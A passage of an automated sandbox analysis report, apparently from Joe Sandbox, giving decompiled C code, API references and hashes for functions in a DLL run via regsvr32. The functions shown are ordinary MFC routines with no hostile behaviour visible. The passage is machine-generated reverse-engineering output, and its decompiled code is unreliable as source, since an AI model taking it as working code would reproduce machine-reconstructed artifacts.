GetPropA.USER32 ref: 10011586
GlobalAddAtomA.KERNEL32 ref: 1001158E
SetWindowLongA.USER32 ref: 1001159C
CallNextHookEx.USER32 ref: 100115B4
UnhookWindowsHookEx.USER32(?), ref: 100115C8

Strings

AfxOldWndProc423, xrefs: 1001156C, 10011571, 1001157C, 10011584, 1001158D
#32768, xrefs: 100114F6, 100114FB, 10011545
ime, xrefs: 1001144E

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 1191297049-4034971020
Opcode ID: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
Instruction ID: 45731ac5847e6eda9355a9c996fe1b8867c86b30351497dbe8ef7f26860efac9
Opcode Fuzzy Hash: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
Instruction Fuzzy Hash: 09619E31900666EFEB14DB61CC49BDE7BA9EF483A1F214254F506AB191DB34DEC1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D6C3, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000D6C3() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x1005a76c; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x1005a770 = E1000D66B(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x1005a750 = 0;
						 *0x1005a754 = 0;
						 *0x1005a758 = 0;
						 *0x1005a75c = 0;
						 *0x1005a760 = 0;
						 *0x1005a764 = 0;
						 *0x1005a768 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x1005a750 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x1005a754 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x1005a758 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x1005a75c = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x1005a764 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x1005a760 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x1005a768 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x1005a76c = 1;
					return _t5;
				} else {
					_t24 =  *0x1005a760; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

0x1000d6c6
0x1000d6cc
0x1000d6db
0x1000d6e7
0x1000d6f2
0x1000d6f4
0x1000d6f6
0x1000d78a
0x1000d78a
0x1000d790
0x1000d796
0x1000d79c
0x1000d7a2
0x1000d7a8
0x1000d7ae
0x1000d7b4
0x1000d6fc
0x1000d708
0x1000d70a
0x1000d70c
0x1000d711
0x00000000
0x1000d713
0x1000d719
0x1000d71b
0x1000d71d
0x1000d722
0x00000000
0x1000d724
0x1000d72a
0x1000d72c
0x1000d72e
0x1000d733
0x00000000
0x1000d735
0x1000d73b
0x1000d73d
0x1000d73f
0x1000d744
0x00000000
0x1000d746
0x1000d74c
0x1000d74e
0x1000d750
0x1000d755
0x00000000
0x1000d757
0x1000d75d
0x1000d75f
0x1000d761
0x1000d766
0x00000000
0x1000d768
0x1000d76e
0x1000d770
0x1000d772
0x1000d777
0x00000000
0x1000d779
0x1000d77b
0x1000d77b
0x1000d77b
0x1000d777
0x1000d766
0x1000d755
0x1000d744
0x1000d733
0x1000d722
0x1000d711
0x1000d77e
0x1000d789
0x1000d6ce
0x1000d6d0
0x1000d6da
0x1000d6da

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,74ED5D80,1000D80F,?,?,?,?,?,?,?,1000F61E,00000000,00000002,00000028), ref: 1000D6EC
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1000D708
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1000D719
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000D72A
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000D73B
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000D74C
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000D75D
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 1000D76E

Strings

GetMonitorInfoA, xrefs: 1000D757
MonitorFromRect, xrefs: 1000D724
GetSystemMetrics, xrefs: 1000D702
USER32, xrefs: 1000D6E2
EnumDisplayMonitors, xrefs: 1000D746
MonitorFromWindow, xrefs: 1000D713
EnumDisplayDevicesA, xrefs: 1000D768
MonitorFromPoint, xrefs: 1000D735

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
Instruction ID: 93615fb53cb164fe7f3d347b700eade87a81924dee4312457033af375ccc55a3
Opcode Fuzzy Hash: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
Instruction Fuzzy Hash: 7921E3B19097699BE701EF369DC856DBAF5F34F281391453FE109D2528EB3884C6EE20

Uniqueness

Uniqueness Score: -1.00%

Function 1000F530, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000F530(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E10012862(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E1000D86F(_t121, E1000D804(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E1000A7CE();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E1000D86F(_t121, E1000D804(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001297A(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

0x1000f530
0x1000f530
0x1000f537
0x1000f53a
0x1000f542
0x1000f545
0x1000f54a
0x1000f558
0x1000f56a
0x1000f55a
0x1000f55d
0x1000f55d
0x1000f570
0x1000f574
0x1000f580
0x1000f588
0x1000f58a
0x1000f58a
0x1000f588
0x1000f54c
0x1000f54c
0x1000f54c
0x1000f54c
0x1000f58c
0x1000f59a
0x1000f5a3
0x1000f643
0x1000f64a
0x1000f651
0x1000f65b
0x1000f5a9
0x1000f5ab
0x1000f5b0
0x1000f5bb
0x1000f5c4
0x1000f5c4
0x1000f5bb
0x1000f5c8
0x1000f5cf
0x1000f610
0x1000f61f
0x1000f62c
0x1000f5d1
0x1000f5d1
0x1000f5d8
0x1000f5da
0x1000f5da
0x1000f5ea
0x1000f5fd
0x1000f607
0x1000f607
0x1000f5cf
0x1000f66a
0x1000f66f
0x1000f674
0x1000f678
0x1000f67b
0x1000f682
0x1000f68a
0x1000f692
0x1000f69a
0x1000f6a1
0x1000f6a6
0x1000f6b2
0x1000f6ba
0x1000f6ba
0x1000f6a8
0x1000f6a8
0x1000f6a8
0x1000f6c0
0x1000f6cf
0x1000f6d7
0x1000f6d7
0x1000f6c2
0x1000f6c2
0x1000f6c2
0x1000f6ef

APIs

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

GetParent.USER32(?), ref: 1000F55D
SendMessageA.USER32 ref: 1000F580
GetWindowRect.USER32 ref: 1000F59A
GetWindowLongA.USER32 ref: 1000F5B0
CopyRect.USER32 ref: 1000F5FD
CopyRect.USER32 ref: 1000F607
GetWindowRect.USER32 ref: 1000F610
CopyRect.USER32 ref: 1000F62C

Strings

(, xrefs: 1000F5C8

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
Instruction ID: 3f3129d87232bc90929dbfd76231b55f7e5f3d8dd267dcccc126c4261812b80e
Opcode Fuzzy Hash: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
Instruction Fuzzy Hash: 84517072900619AFEB00DFA8CC85EEEBBB9EF48290F154119FA05F3594DB30ED419B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000A1F9, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A1F9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10058f2c; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E1000A0DB(0, _t12, _t15, _t16, _t20);
					}
					 *0x10058f1c = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10058f20 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10058f24 = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10058f1c; // 0x0
					 *0x10058f28 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10058f20; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10058f24; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10058f20; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10058f24; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10058f2c = 1;
				}
				return _t18;
			}

0x1000a1f9
0x1000a1f9
0x1000a1ff
0x1000a203
0x1000a206
0x1000a209
0x1000a210
0x1000a221
0x1000a223
0x1000a225
0x1000a227
0x1000a227
0x1000a227
0x1000a241
0x1000a24e
0x1000a25b
0x1000a260
0x1000a262
0x1000a268
0x1000a26d
0x1000a26e
0x1000a286
0x1000a28c
0x00000000
0x1000a28e
0x1000a28e
0x1000a294
0x00000000
0x1000a296
0x1000a296
0x1000a298
0x00000000
0x00000000
0x1000a298
0x1000a294
0x1000a270
0x1000a270
0x1000a276
0x00000000
0x1000a278
0x1000a278
0x1000a27e
0x00000000
0x1000a280
0x1000a280
0x1000a282
0x00000000
0x1000a284
0x1000a282
0x1000a27e
0x1000a276
0x1000a29a
0x1000a29a
0x1000a2a6

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1000ACB1,000000FF), ref: 1000A21B
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 1000A239
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1000A246
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 1000A253
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1000A260

Strings

CreateActCtxA, xrefs: 1000A233
ReleaseActCtx, xrefs: 1000A23B
DeactivateActCtx, xrefs: 1000A255
ActivateActCtx, xrefs: 1000A248
KERNEL32, xrefs: 1000A216

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
Instruction ID: c20c66116e7296d4a0afd5037f2dffc74684b1862cb446d2da729e570b87d5d5
Opcode Fuzzy Hash: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
Instruction Fuzzy Hash: 3611C076C04266EBFB10DFA9ACC45097BE5E74F2D8301423FEA05A2124D7720980CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB74, Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CB74(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E10017BF4(E10028029, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1000D5EC(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E1000D5EC(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E1000C6AC(_t84, _t100, __eflags);
					E1000FC04(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E1000A7CE();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E100128F8(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E10012913(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E100115DC(_t96, __eflags, _t100);
					_t58 = E1000FB5C(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E1000C984(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E10012862(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E1000F6F2(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E1001297A(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E10012913(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E1000C6E6(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E10017C60(_t63);
				}
			}

0x1000cb74
0x1000cb74
0x1000cb74
0x1000cb7b
0x1000cb80
0x1000cb82
0x1000cb88
0x1000cb8e
0x1000cb91
0x1000cb96
0x1000cb99
0x1000cb9b
0x1000cb9e
0x1000cba5
0x1000cbb6
0x1000cbbc
0x1000cbbc
0x1000cbc2
0x1000cbc7
0x1000cbcd
0x1000cbcd
0x1000cbd3
0x1000cbdd
0x1000cbe4
0x1000cbe7
0x1000cbec
0x1000cbef
0x1000cbf2
0x1000cbf5
0x1000cbf8
0x1000cc00
0x1000cc03
0x1000cc0e
0x1000cc10
0x1000cc17
0x1000cc1d
0x1000cc29
0x1000cc2b
0x1000cc2d
0x1000cc30
0x1000cc34
0x1000cc3c
0x1000cc3e
0x1000cc40
0x1000cc47
0x1000cc49
0x1000cc4d
0x1000cc4f
0x1000cc54
0x1000cc54
0x1000cc49
0x1000cc3e
0x1000cc30
0x1000cc10
0x1000cc03
0x1000cc5b
0x1000cc60
0x1000cc68
0x1000cc6d
0x1000cc6e
0x1000cc6f
0x1000cc74
0x1000cc79
0x1000cc7b
0x1000cc7d
0x1000cc7f
0x1000cc83
0x1000cc87
0x1000cc8a
0x1000cc8f
0x1000cc93
0x1000cc97
0x1000cc97
0x1000cc9b
0x1000cca0
0x1000cca0
0x1000cca0
0x1000cca2
0x1000cca5
0x1000ccb3
0x1000ccb3
0x1000cca5
0x1000ccb8
0x1000ccdb
0x1000ccde
0x1000cce4
0x1000cce4
0x1000cce9
0x1000ccec
0x1000ccf3
0x1000ccf3
0x1000ccf9
0x1000ccfc
0x1000cd04
0x1000cd07
0x1000cd0c
0x1000cd0c
0x1000cd07
0x1000cd16
0x1000cd1b
0x1000cd20
0x1000cd23
0x1000cd28
0x1000cd28
0x1000cd2e
0x00000000
0x1000cbd5
0x1000cbd5
0x1000cd31
0x1000cd36
0x1000cd36

APIs

__EH_prolog3_catch.LIBCMT ref: 1000CB7B
FindResourceA.KERNEL32(?,?,00000005), ref: 1000CBAE
LoadResource.KERNEL32(?,00000000), ref: 1000CBB6
LockResource.KERNEL32(?,00000024,100014EC,00000000,3643B451), ref: 1000CBC7
GetDesktopWindow.USER32 ref: 1000CBFA
IsWindowEnabled.USER32(?), ref: 1000CC08
EnableWindow.USER32(?,00000000), ref: 1000CC17

Part of subcall function 100128F8: IsWindowEnabled.USER32(?), ref: 10012901

Part of subcall function 10012913: EnableWindow.USER32(?,3643B451), ref: 10012920

EnableWindow.USER32(?,00000001), ref: 1000CCF3
GetActiveWindow.USER32 ref: 1000CCFE
SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,3643B451), ref: 1000CD0C
FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,3643B451), ref: 1000CD28

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
Instruction ID: 8f78f448105f665873ac1cd7b5fa33a3343bcf420d8a1ae80c8a79bff85a7528
Opcode Fuzzy Hash: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
Instruction Fuzzy Hash: A251BF34A007098BFF11DFA5C999EAEBBF1EF44781F20002EE506A6195CB759E41CF55

Uniqueness

Uniqueness Score: -1.00%

Function 10011245, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10011245(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E10017BF4(E1002864B, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E1000FB5C(1, _t60, _t71,  *(_t71 + 0x14));
					E10011159(_t60, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E100111CF(1, _t66, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E1000E865(E1000FB5C(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E100100F3(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E10017C60( *(_t71 - 0x14));
			}

0x10011245
0x10011245
0x10011245
0x1001124c
0x10011251
0x10011254
0x1001125b
0x10011261
0x10011265
0x10011269
0x10011271
0x10011272
0x10011275
0x1001131e
0x10011330
0x00000000
0x1001127b
0x1001127b
0x1001127e
0x10011316
0x10011335
0x10011337
0x00000000
0x00000000
0x10011280
0x10011280
0x10011283
0x100112dc
0x100112e4
0x100112f2
0x00000000
0x10011285
0x1001128a
0x10011339
0x1001134c
0x10011290
0x100112a1
0x100112be
0x100112c6
0x100112c6
0x1001128a
0x10011283
0x1001127e
